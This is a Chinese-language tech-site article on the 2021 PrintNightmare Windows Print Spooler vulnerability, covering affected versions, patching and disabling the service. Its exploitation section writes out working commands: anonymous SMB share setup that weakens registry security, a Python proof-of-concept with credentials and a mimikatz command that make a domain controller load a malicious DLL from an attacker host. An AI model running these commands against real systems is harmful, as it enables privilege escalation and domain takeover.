0

0

Windows Print Spooler权限提升漏洞( PrintNightmare)

雪夜

雪夜

发布时间:2025-07-21 08:54:29

|

1074人浏览过

|

来源于php中文网

原创

windows print spooler权限提升漏洞(printnightmare)

目录

一:漏洞概述

二:影响范围

三:漏洞利用

漏洞过程

创建匿名SMB共享

使用Python脚本攻击

使用mimikatz攻击

四:漏洞防护

4.1 官方升级

4.2 临时防护措施

漏洞概述

2021年6月9日,微软发布了6月份的安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞(CVE-2021-1675),该漏洞被标记为提权漏洞。普通用户可以利用此漏洞以管理员身份在运行打印后台处理程序服务的系统上执行代码。然而,在6月21日,微软将该漏洞升级为远程代码执行漏洞。

2021年6月29日,有安全研究员在GitHub上公布了打印机漏洞利用代码。然而,令人惊讶的是,该漏洞利用代码针对的是一个与CVE-2021-1675类似但不完全相同的漏洞,并且微软针对此漏洞并未推出更新补丁,因此这是一个0day漏洞,这个0day漏洞被称为PrintNightmare,最新的漏洞编号为CVE-2021-34527。

Print Spooler是Windows系统中用于管理打印相关事务的服务,用于后台执行打印作业并处理与打印机的交互,管理所有本地和网络打印队列及控制所有打印工作。该服务对应的进程spoolsv.exe以SYSTEM权限执行,其设计中存在的一个严重缺陷,由于SeLoadDriverPrivilege中的鉴权存在代码缺陷,参数可以被攻击者控制,普通用户可以通过RPC触发RpcAddPrinterDrive绕过安全检查并写入恶意驱动程序。如果一个域中存在此漏洞,域中普通用户即可通过连接域控Spooler服务,向域控中添加恶意驱动,从而控制整个域环境。

影响范围

受影响版本包括:

  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows RT 8.1
  • Windows 8.1 for x64-based systems
  • Windows 8.1 for 32-bit systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2016
  • Windows 10 Version 1607 for x64-based Systems
  • Windows 10 Version 1607 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 for 32-bit Systems
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows 10 Version 20H2 for ARM64-based Systems
  • Windows 10 Version 20H2 for 32-bit Systems
  • Windows 10 Version 20H2 for x64-based Systems
  • Windows Server, version 2004 (Server Core installation)
  • Windows 10 Version 2004 for x64-based Systems
  • Windows 10 Version 2004 for ARM64-based Systems
  • Windows 10 Version 2004 for 32-bit Systems
  • Windows 10 Version 21H1 for 32-bit Systems
  • Windows 10 Version 21H1 for ARM64-based Systems
  • Windows 10 Version 21H1 for x64-based Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows Server 2019 (Server Core installation)
  • Windows Server 2019
  • Windows 10 Version 1809 for ARM64-based Systems
  • Windows 10 Version 1809 for x64-based Systems
  • Windows 10 Version 1809 for 32-bit Systems

漏洞利用

漏洞过程

  1. 首先,我们搭建一个SMB匿名共享,放置我们的恶意DLL文件。
  2. 然后执行利用工具,工具运行后会先检测C:WindowsSystem32DriverStoreFileRepository目录下的ntprint.inf_amd64_xx文件名,并自动替换。

Windows Print Spooler权限提升漏洞( PrintNightmare)

接着,工具会远程拉取我们设置的匿名共享的恶意DLL文件。Python脚本会将我们的恶意DLL文件传到域控的C:WindowsSystem32spooldriversd目录下并执行。而mimikatz则会将我们的恶意DLL文件传到域控的C:WindowsSystem32spooldriversdold目录下并执行(会创建old目录)。检测是否存在漏洞

首先检测目标机器是否开启了MS-RPRN服务,如果存在则可以尝试利用:

INFINITE ALBUM
INFINITE ALBUM

面向游戏玩家的生成式AI音乐

下载
python3 rpcdump.py @10.211.55.14 | grep MS-RPRN

Windows Print Spooler权限提升漏洞( PrintNightmare)

创建匿名SMB共享

mkdir C:share
icacls C:share /T /grant "ANONYMOUS LOGON":r
icacls C:share /T /grant Everyone:r
New-SmbShare -Path C:share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f
REG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f

执行完以上语句后,部分机器需要重启。

使用Python脚本攻击

python3 CVE-2021-1675.py xie.com/test:P@ss1234@10.211.55.14 '\10.211.55.7share.dll'

Windows Print Spooler权限提升漏洞( PrintNightmare)

使用mimikatz攻击

mimikatz.exe misc::printnightmare /server:10.211.55.14 /library:\10.211.55.7share.dll

Windows Print Spooler权限提升漏洞( PrintNightmare)

实战测试攻击Windows Server 2016、2019均能成功上线。Server 2012只能上传恶意DLL,不能执行上线,08未攻击成功。

漏洞防护

4.1

官方升级

目前,微软官方已针对支持的系统版本发布了修复该漏洞的安全补丁,强烈建议受影响用户尽快安装补丁进行防护。官方下载链接:https://www.php.cn/link/304153cda8ac325dcd383ed8e5026d8e

注意:由于网络问题、计算机环境问题等原因,Windows Update的补丁更新可能出现失败。用户在安装补丁后,应及时检查补丁是否成功更新。右键点击Windows图标,选择“设置(N)”,选择“更新和安全”-“Windows更新”,查看该页面上的提示信息,也可点击“查看更新历史记录”查看历史更新情况。针对未成功安装的更新,可点击更新名称跳转到微软官方下载页面,建议用户点击该页面上的链接,转到“Microsoft更新目录”网站下载独立程序包并安装。

4.2

临时防护措施

如果相关用户暂时无法进行补丁更新,可以通过禁用Print Spooler服务来进行缓解:

  1. 在服务应用(services.msc)中找到Print Spooler服务。

Windows Print Spooler权限提升漏洞( PrintNightmare)

  1. 停止运行服务,同时将“启动类型”修改为“禁用”。

Windows Print Spooler权限提升漏洞( PrintNightmare)

参考:

https://www.php.cn/link/c56b7becfe4383d3ef77d68c78a5d2bd

https://www.php.cn/link/5b48cf6d948c70034f7a239f8e5c566d

https://www.php.cn/link/f50118652ac9772880a8fe2822522f8f

https://www.php.cn/link/68f4f1c9069efc3169ccef543fc9b706

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

通义千问
通义千问

阿里巴巴推出的全能AI助手

腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

相关专题

更多
python中print函数的用法
python中print函数的用法

python中print函数的语法是“print(value1, value2, ..., sep=' ', end=' ', file=sys.stdout, flush=False)”。本专题为大家提供print相关的文章、下载、课程内容,供大家免费下载体验。

192

2023.09.27

python print用法与作用
python print用法与作用

本专题整合了python print的用法、作用、函数功能相关内容,阅读专题下面的文章了解更多详细教程。

17

2026.02.03

github中文官网入口 github中文版官网网页进入
github中文官网入口 github中文版官网网页进入

github中文官网入口https://docs.github.com/zh/get-started,GitHub 是一种基于云的平台,可在其中存储、共享并与他人一起编写代码。 通过将代码存储在GitHub 上的“存储库”中,你可以: “展示或共享”你的工作。 持续“跟踪和管理”对代码的更改。

3722

2026.01.21

windows查看端口占用情况
windows查看端口占用情况

Windows端口可以认为是计算机与外界通讯交流的出入口。逻辑意义上的端口一般是指TCP/IP协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。怎么查看windows端口占用情况呢?php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

1431

2023.07.26

查看端口占用情况windows
查看端口占用情况windows

端口占用是指与端口关联的软件占用端口而使得其他应用程序无法使用这些端口,端口占用问题是计算机系统编程领域的一个常见问题,端口占用的根本原因可能是操作系统的一些错误,服务器也可能会出现端口占用问题。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

1164

2023.07.27

windows照片无法显示
windows照片无法显示

当我们尝试打开一张图片时,可能会出现一个错误提示,提示说"Windows照片查看器无法显示此图片,因为计算机上的可用内存不足",本专题为大家提供windows照片无法显示相关的文章,帮助大家解决该问题。

833

2023.08.01

windows查看端口被占用的情况
windows查看端口被占用的情况

windows查看端口被占用的情况的方法:1、使用Windows自带的资源监视器;2、使用命令提示符查看端口信息;3、使用任务管理器查看占用端口的进程。本专题为大家提供windows查看端口被占用的情况的相关的文章、下载、课程内容,供大家免费下载体验。

461

2023.08.02

windows无法访问共享电脑
windows无法访问共享电脑

在现代社会中,共享电脑是办公室和家庭的重要组成部分。然而,有时我们可能会遇到Windows无法访问共享电脑的问题。这个问题可能会导致数据无法共享,影响工作和生活的正常进行。php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

2361

2023.08.08

JavaScript浏览器渲染机制与前端性能优化实践
JavaScript浏览器渲染机制与前端性能优化实践

本专题围绕 JavaScript 在浏览器中的执行与渲染机制展开,系统讲解 DOM 构建、CSSOM 解析、重排与重绘原理,以及关键渲染路径优化方法。内容涵盖事件循环机制、异步任务调度、资源加载优化、代码拆分与懒加载等性能优化策略。通过真实前端项目案例,帮助开发者理解浏览器底层工作原理,并掌握提升网页加载速度与交互体验的实用技巧。

23

2026.03.06

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
PostgreSQL 教程
PostgreSQL 教程

共48课时 | 10.3万人学习

Excel 教程
Excel 教程

共162课时 | 20.4万人学习

PHP基础入门课程
PHP基础入门课程

共33课时 | 2.2万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号